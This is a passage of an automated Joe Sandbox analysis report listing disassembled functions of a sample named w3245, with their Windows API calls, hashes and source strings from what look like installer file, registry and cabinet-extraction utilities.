                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID: dirutil.cpp
                                                                                                                                                              • API String ID: 1375471231-2193988115
                                                                                                                                                              • Opcode ID: 13d5556ee140443ac27a1d3c3aa8b86e8b53a714250dd312e4619e96f596fab8
                                                                                                                                                              • Instruction ID: 2f87296e81f015ffc548ff65407b458b25c72aed447acc17b3e1d0f0fdf68933
                                                                                                                                                              • Opcode Fuzzy Hash: 13d5556ee140443ac27a1d3c3aa8b86e8b53a714250dd312e4619e96f596fab8
                                                                                                                                                              • Instruction Fuzzy Hash: 8811D23660033DA7DB321AA54C65F7BB7A4EF75B61F19402DFD84EA250E36C8C9092D1
                                                                                                                                                              Function 007C56A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,007C6595,007C6595,?,007C563D,?,?,00000000), ref: 007C56E5
                                                                                                                                                              • GetLastError.KERNEL32(?,007C563D,?,?,00000000,?,?,007C6595,?,007C7F02,?,?,?,?,?), ref: 007C5714
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareErrorLastString
                                                                                                                                                              • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                                                              • API String ID: 1733990998-4228644734
                                                                                                                                                              • Opcode ID: 68b81ecc2eeebc614ca0b3874c908c73f31a7600aae005ea3ac481f97d4d80d8
                                                                                                                                                              • Instruction ID: fca64bc9d1213082e08c5452ba9b9bf7954d112ab2fdd78ef3f5cd68d3e98a91
                                                                                                                                                              • Opcode Fuzzy Hash: 68b81ecc2eeebc614ca0b3874c908c73f31a7600aae005ea3ac481f97d4d80d8
                                                                                                                                                              • Instruction Fuzzy Hash: 23210736640915EBC7148F98CD45F5AB7A4FB45730B21031DE924EB3C0EA36FD818690
                                                                                                                                                              Function 00800A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00800A38
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800A46
                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 00800A8B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800A95
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                              • String ID: procutil.cpp
                                                                                                                                                              • API String ID: 590199018-1178289305
                                                                                                                                                              • Opcode ID: 3f01f41ba7328c25161b00249bddda8bacb460d06cb35aaeffe1eb8d9099d90e
                                                                                                                                                              • Instruction ID: a1a35bb2487d7f2e6a1b3d1e449e46bb889452bc5a7814b6be91651cbb4f5fa9
                                                                                                                                                              • Opcode Fuzzy Hash: 3f01f41ba7328c25161b00249bddda8bacb460d06cb35aaeffe1eb8d9099d90e
                                                                                                                                                              • Instruction Fuzzy Hash: 74117037E41736EBDB609B949D08B9E7AA4FB04760F128255ED54EB3D0E2348E009AD1
                                                                                                                                                              Function 007E09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007E140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,007E0A19,?,?,?), ref: 007E1434
                                                                                                                                                                • Part of subcall function 007E140C: GetLastError.KERNEL32(?,007E0A19,?,?,?), ref: 007E143E
                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 007E0A27
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007E0A31
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to read during cabinet extraction., xrefs: 007E0A5F
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0A55
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$PointerRead
                                                                                                                                                              • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                              • API String ID: 2170121939-2426083571
                                                                                                                                                              • Opcode ID: e0604568e6b71430921950a4dea3d3cc4d56f4a8a80e190f16428e91a51aada9
                                                                                                                                                              • Instruction ID: d309531b43531ba59a0b66b03841a0b4112aaf19f76892a82d9012da76bcdadc
                                                                                                                                                              • Opcode Fuzzy Hash: e0604568e6b71430921950a4dea3d3cc4d56f4a8a80e190f16428e91a51aada9
                                                                                                                                                              • Instruction Fuzzy Hash: 5E11E536902269FBCB219F96DC09E9E7F68FF08760B018125FD14A7250C7349910D7D0
                                                                                                                                                              Function 007E140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,007E0A19,?,?,?), ref: 007E1434
                                                                                                                                                              • GetLastError.KERNEL32(?,007E0A19,?,?,?), ref: 007E143E
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to move to virtual file pointer., xrefs: 007E146C
                                                                                                                                                              • cabextract.cpp, xrefs: 007E1462
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                              • API String ID: 2976181284-3005670968
                                                                                                                                                              • Opcode ID: a52b2db4a4eeefe0c167146b70215c6b808006e310f29d47c20b84c1a9dd0f45
                                                                                                                                                              • Instruction ID: d00735d0e710d30754d03306bcd17f3bce02fc6235bedcbbcc2de81a36218d4f
                                                                                                                                                              • Opcode Fuzzy Hash: a52b2db4a4eeefe0c167146b70215c6b808006e310f29d47c20b84c1a9dd0f45
                                                                                                                                                              • Instruction Fuzzy Hash: 5801A2379426BAB7C7225A96CC0AE8BFF28FF057707118129FD289A791D7399C10C6D0
                                                                                                                                                              Function 00803EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00803F73
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00803FD6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 1948546556-2967768451
                                                                                                                                                              • Opcode ID: 0d4aadfb6bacf45f8c0faeadae7594e8f15834ce55b1e784df0ee43e9fa43689
                                                                                                                                                              • Instruction ID: b7c8a88fbbf2ad07dc0f5e0ce8119c632c355f545ab5bb050ff07a8dcf92891a
                                                                                                                                                              • Opcode Fuzzy Hash: 0d4aadfb6bacf45f8c0faeadae7594e8f15834ce55b1e784df0ee43e9fa43689
                                                                                                                                                              • Instruction Fuzzy Hash: 4A316071E0026A9FDB61CF18CD40BDA77B8FB04751F0040AAFA48E7280DBB49EC48B95
                                                                                                                                                              Function 00804E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00803F9A,?,?,?), ref: 00804E5E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00803F9A,?,?,?), ref: 00804E68
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 442123175-2967768451
                                                                                                                                                              • Opcode ID: b079ab05ecfac0313a80a48c1ed25f8694202225397c751d3dd9c7e438b35a49
                                                                                                                                                              • Instruction ID: 25fefedea4d937b6ad731e1511d91e30cf9f27cdef2eb2ca65c5047485d04b4e
                                                                                                                                                              • Opcode Fuzzy Hash: b079ab05ecfac0313a80a48c1ed25f8694202225397c751d3dd9c7e438b35a49
                                                                                                                                                              • Instruction Fuzzy Hash: 2FF06D73A41229ABC7608E9ADC45EDFBB6DFB44771F510125FE04E7180E731AE0086E0
                                                                                                                                                              Function 0080490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 00804925
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 0080492F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 2976181284-2967768451
                                                                                                                                                              • Opcode ID: 7676b73c2acb9c7d9e7557891149d5d0e776f1a902a2dee2202b725d68074191
                                                                                                                                                              • Instruction ID: 77d66f4652267344906b6155b321336e1967d959b8db461790d87cfb383672a1
                                                                                                                                                              • Opcode Fuzzy Hash: 7676b73c2acb9c7d9e7557891149d5d0e776f1a902a2dee2202b725d68074191
                                                                                                                                                              • Instruction Fuzzy Hash: D5F086B664012AABDB218F85DC05EAB7FA8FF04760B014168BE54D7361E731DC10D7E0
                                                                                                                                                              Function 007C3838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C3877
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C3881
                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 007C38EA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1230559179-0
                                                                                                                                                              • Opcode ID: 443ae5636d3b8ddec217ef63a173dc9ff2d739b5ba487e2b367a44196e687dc0
                                                                                                                                                              • Instruction ID: 3ba8efd4f60bb9e0d0ffadd524ee65318424b4c0f223d5f4f4565deb6ba339d1
                                                                                                                                                              • Opcode Fuzzy Hash: 443ae5636d3b8ddec217ef63a173dc9ff2d739b5ba487e2b367a44196e687dc0
                                                                                                                                                              • Instruction Fuzzy Hash: A721F5B2D0173DA7DB209B658C49F9A77A8AB44720F1141ADBE14EB241DA78EE4087E0
                                                                                                                                                              Function 007C3A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,007C3BB6,00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8), ref: 007C3A20
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,007C3BB6,00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8,000001C7,00000100), ref: 007C3A27
                                                                                                                                                              • GetLastError.KERNEL32(?,007C3BB6,00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8,000001C7,00000100,?), ref: 007C3A31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 406640338-0
                                                                                                                                                              • Opcode ID: ea16da1fbf89bf08d6e6aaa81929687eef6062013368a2d8ba40bc3b15c507fe
                                                                                                                                                              • Instruction ID: f111fd990b5df72fe96c67a2f8f55601f6e0758af943930d9165b6e5806cbd71
                                                                                                                                                              • Opcode Fuzzy Hash: ea16da1fbf89bf08d6e6aaa81929687eef6062013368a2d8ba40bc3b15c507fe
                                                                                                                                                              • Instruction Fuzzy Hash: C4D01273A0453957C72117E65C5CA5B7F58FF04BA17018129FD44D7230D725CD1096E4
                                                                                                                                                              Function 00800F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID: regutil.cpp
                                                                                                                                                              • API String ID: 71445658-955085611
                                                                                                                                                              • Opcode ID: eb656271a73cfc24d31f2019bc0117b936dfc2a59d55c55b15cf08673d9d1ecd
                                                                                                                                                              • Instruction ID: b9b6e707f2311d65b27badd16206bd9e3ed1e055ffa62ad55a5e3312e822d4c8
                                                                                                                                                              • Opcode Fuzzy Hash: eb656271a73cfc24d31f2019bc0117b936dfc2a59d55c55b15cf08673d9d1ecd
                                                                                                                                                              • Instruction Fuzzy Hash: D0F0F63360213767DB7005968C05F6BAA49FB957B0F158135BD46DA2D0EE218C10BAF0
                                                                                                                                                              Function 007FF479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 007FF491
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID: PA9n
                                                                                                                                                              • API String ID: 1269201914-1067447980
                                                                                                                                                              • Opcode ID: b25428f8d24ce8de73687efe697d7598078645699b347fbc308798a33fa993f7
                                                                                                                                                              • Instruction ID: 08e637280073d5e97a511e8bcc4232d9e6cc3f5fab5fd6ff6e70f50c11831d9a
                                                                                                                                                              • Opcode Fuzzy Hash: b25428f8d24ce8de73687efe697d7598078645699b347fbc308798a33fa993f7
                                                                                                                                                              • Instruction Fuzzy Hash: 13B012A527A411FD764811553C02C37050CFEC1F22331C26EF590C0181EC440CC48033
                                                                                                                                                              Function 007FF4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 007FF491
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID: PA9n
                                                                                                                                                              • API String ID: 1269201914-1067447980
                                                                                                                                                              • Opcode ID: 089b682ce6db1dec956fe257e8a5412536d241f98fd9c3ca29e507e8101227cf
                                                                                                                                                              • Instruction ID: 3ee518fe549b3901a23badc306aef514a154a4044c88f5b07b81854fe1b3ae42
                                                                                                                                                              • Opcode Fuzzy Hash: 089b682ce6db1dec956fe257e8a5412536d241f98fd9c3ca29e507e8101227cf
                                                                                                                                                              • Instruction Fuzzy Hash: 44B012A127A551ED768852593C02C37050CFEC5F22331C26EF190C1281EC440CC44033
                                                                                                                                                              Function 007FF49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 007FF491
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID: PA9n
                                                                                                                                                              • API String ID: 1269201914-1067447980
                                                                                                                                                              • Opcode ID: 7ac6bf8529e6296aa601b07f5c2a2995b94342609cf3c2d164820f774157876b
                                                                                                                                                              • Instruction ID: 87c0a6be75ef4f297e1b7df0d30b6d403d9cbed6ab48d8749348c50643cd4d0e
                                                                                                                                                              • Opcode Fuzzy Hash: 7ac6bf8529e6296aa601b07f5c2a2995b94342609cf3c2d164820f774157876b
                                                                                                                                                              • Instruction Fuzzy Hash: 68B012A127A411EE768851593D03C37050CFEC6F22331816EF190C1281EC480CC54033
                                                                                                                                                              Function 008035C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 008035F8
                                                                                                                                                                • Part of subcall function 0080304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00803609,00000000,?,00000000), ref: 00803069
                                                                                                                                                                • Part of subcall function 0080304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,007EC025,?,007C5405,?,00000000,?), ref: 00803075
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
